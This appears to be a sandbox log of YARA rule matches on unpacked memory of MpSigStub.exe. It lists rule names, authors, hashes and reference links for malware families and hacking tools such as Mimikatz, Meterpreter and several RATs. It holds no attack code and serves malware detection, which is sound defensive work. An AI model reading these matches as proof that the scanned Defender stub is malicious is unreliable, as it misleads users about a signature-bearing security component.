Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: CredentialStealer_Generic_Backdoor date = 2017-06-07, hash1 = edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c, author = Florian Roth, description = Detects credential stealer byed on many strings that indicate password store access, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48adbfa.121.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a3f2f03e.60.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
